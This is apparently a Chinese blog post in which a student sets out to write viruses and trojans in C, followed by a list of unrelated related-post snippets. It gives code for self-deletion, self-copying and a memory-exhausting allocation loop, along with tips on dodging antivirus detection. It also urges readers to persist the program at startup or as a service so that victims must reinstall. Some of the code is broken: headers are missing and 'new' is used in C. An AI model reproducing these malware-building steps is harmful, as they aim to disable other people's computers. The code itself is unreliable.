C语言 linux 木马,C语言写病毒,木马
以前在网吧花了大投资的游戏账号被心痛的盗过一次,于是到了大学就傻逼傻逼的想写病毒,木马,出出风头,然后到处到处搜索,相关方法,以为这样就能写出病毒木马。一直持续到前段日子,偶尔看到一本关于杀毒软件是怎么查杀木马的资料,才知晓 自己当时的做法是多么的愚蠢,当时想到的一些方法,很多年前都被人想到了。看到的资料是也是前几年的。你说防病毒的书都不看还怎么写病毒。目前还是老实的学习吧,计算机是一门发展飞速的技术,以前我们只要学一点就能耀武扬威。现在这法子行不通了。大学课堂上的教材落后于外面技术发展5年。大家还是多去图书馆看点实在的书吧。
技术不是艺术。光有天赋是远远不够的。
病毒的特征
,windows中的autorun.inf 能自动运行
以任意方式执行文件shellexecute命令
Autorun的免疫程序可以防止inf再次被其他文件修改
利用外面的脚本语言给定的参数选择性运行程序的某种方案(例如.dos.shell.bat,autorun.inf......)
利用new,进程ID,read,write,和。。。。。
。利用把exe变成rc文件用vc打开import 你想要的应用程序 ico图标文件
领悟了一点
晚上回去补上
貌似改变当前程序运行的工作目录,就可以对自己进行自我删除????这就是传说中的自我销毁?待测试
#include
#include
#include
#include
int main(int argc,char *argv[])
{
char pwd[40]="del ";
chdir("c:\\");
strcat(pwd,argv[0]);
system(pwd);
return 0;
}
linux中有这么一句话:在进程运行过程中,当前目录所在的文件系统是不能卸载的,,,???如何理解??待解决?跟自我销毁有什么关系?
在linux中的这段代码红色部分不会执行,??为何?rm 到底 删除的是什么?
我们把中的rm改成其他命令下面的也不会运行 看来这是exec函数族 的 机制问题,待考证
#include
#include
int main(int argc,char *argv[])
{
if( execlp("rm","rm",argv[0],NULL) < 0)
{
perror("execlp error:");
}
else fprintf(stdout,"delmyself success!\n");
printf("del success\n");
return 0;
}
试验证明这段代码调试能过但运行会出错/ 显示。。。。。。test.exe拒绝访问据说可以利用多进程实现,在linux中是允许自我删除的,,就像linux中的守护进程
我们先用c实现 文件的自我复制功能:
#include
int main(int argc,char *argv[])
{
FILE *fp1,*fp2;
char buf[200];
int nmemb;
if((fp1 = fopen(argv[0],"rb")) == NULL)//注意这里是以二进制的方式
{
printf("source error\n");
return -1;
}
if((fp2 = fopen("dest.exe","wb")) == NULL)//注意这里是以二进制的方式
{
printf("dest error\n");
return -2;
}
while(( nmemb = fread(buf,1,100,fp1) ) != 0 )
{
fwrite(buf,1,nmemb,fp2);
}
fclose(fp1);
fclose(fp2);
return 0;
}
windows环境测试通过 linux环境 需要把dest.exe改下 就ok 真正的自我复制哦
若用open函数则会出现下列自动被识别为病毒文件了
用fopen的话
当对某个文件进行重新写入的时候,杀毒软件会以为他要感染其他文件 所以就会发出警报
杀毒软件杀不出来
若有改进 则马上那个更新
下面我们要实现 这个执行文件的破坏能力 那就是用
int *p;
while(1)
{
p = (int *)new(1000000);
}
设想:利用资源把exe文件当二进制文件引入,然后再在主执行文件中调用它,这样可以把捆绑在一起 程序 的分开 已经解决
病毒另一个特征是 感染,这个,得到本目录里的文件名然后重写?利用多进程,??,》?(修改其他文件会被nod32查出)
占用内存空间 导致机子完全死机,大家要记得利用c把这个文件复制到启动栏里去,或者写到服务里去让系统启动的时候自动加载他,这样非专业人士就救不了那电脑了,只有重装,可以写在其他盘里,然后做些处理,让运行时检查这个文件是否存在,不存在 则自我复制,,,,,
,,,,
以后知道了再实现
C语言 linux 木马,C语言写病毒,木马相关推荐
- web安全从基础术语、windows/linux基础到安全漏洞/病毒木马挖掘与分析利用(持续更新)
web安全知识从基础术语.windows/linux基础到安全漏洞/病毒木马挖掘与分析利用(持续更新) 专业术语 web环境搭建 windows基础 linux基础 linux系统命令 linux命令 ...
- linux改环境语言,linux下改变语言环境
1.查看当前语言变量值 $ locale 2.查看系统内安装的语言 $ locale -a 3.临时修改语言值 $ export LC_ALL=en_US.UTF-8 $ export LANGUAG ...
- 半双工通信是指c语言,Linux下C语言实现半双工的UDP通信
------------恢复内容开始------------ Linux下C语言实现半双工的UDP通信 1.单向通信:又称为单工通信,即只能有一个方向的通信而没有反方向的交互.无线电广播或有线电广播以 ...
- 易语言linux计时器,易语言编写linux程序
易语言支持直接写linux程序在windows下调试,然后可以在linux在直接运行.这点觉得挺强的.不知道其它语言是不是也支持这样:在windows下编译,然后可以到linux下执行.虽然只是可以写 ...
- linux 调试c语言,Linux下C语言调试
今天读<Linux程序设计>,第10章调试. 1.C语言预处理定义的一些宏可以帮助我们进行调试好 预处理定义的宏 宏 说明 __LINE__ 代表当前行号的十进制常数 __FILE__ 代 ...
- linux文件读写 c语言,Linux 下 C语言大文件读写(大于4G)
以下的做法整理自论坛上的帖子. 如何create大文件 要大就非常大,1T吧. 有两种方法: 一.dd dd if=/dev/zero of=1T.img bs=1G seek=1024 count= ...
- r语言 linux windows,R 语言 Windows 环境 安装 说明
这篇整理一下Windows 环境下的R 语言的安装. 相关阅读: 一.R 相关软件下载 1.1 R 基础包 Base 里的是基本的安装包,windows 下R 2.14.1 是47M. 1.2 Rto ...
- Linux 应用程序 嵌汇编,Linux下C语言嵌汇编
Using Assembly Language in Linux. Intel和AT&T汇编语法差异: 1.前缀: Intel汇编寄存器和立即数无需前缀.后者寄存器前缀为%,立即数前缀为$. ...
- linux c 判断文件打开文件,Linux 用C语言判断文件和文件夹
Linux 用C语言判断文件和文件夹 #include #include #include #include int access(const char *pathname, int mode); i ...
最新文章
- LeetCode中等题之两两交换链表中的节点
- 使用OpenCV(Python,C ++)无缝克隆
- 5-3 最长连续递增子序列 (20分)
- 前端_JavaScript_面向对象编程
- Redis实现消息队列的4种方案
- 人工神经网络_AI产品经理必修课 | 人工智能概论(四)-人工神经网络
- SQL Server CONVERT() 日期转换为新数据类型的 通用函数
- 基于开源流程引擎Activiti5的工作流开发平台BPMX3
- leetcode344. 反转字符串 史上最简单力扣题
- cron计划任务、权限和归属 、 使用LDAP认证 、 家目录漫游
- autojs长按坐标没反应_Auto.js 一个主要由无障碍服务实现的不需要Root权限的类似按键精灵的自动操作软件...
- 063 模块的四种形式
- 基于JAVA SSM框架的酒店客房管理系统设计
- 计算机自动化专业强的二本大学,2020自动化专业大学排名公布
- 计算机毕设 SpringBoot 校园志愿者管理系统 志愿者管理系统 志愿者信息管理系统Java Vue MySQL数据库 远程调试 代码讲解
- 网络安全学习常用站点导航-持续更新中
- mesh组网是什么意思
- NoteExpress引用文献出现ADDIN NE.Ref.
- DIN卡轨式安装工业宽温8口百兆工业级以太网交换机
- 网络(十三)之ACL的高级应用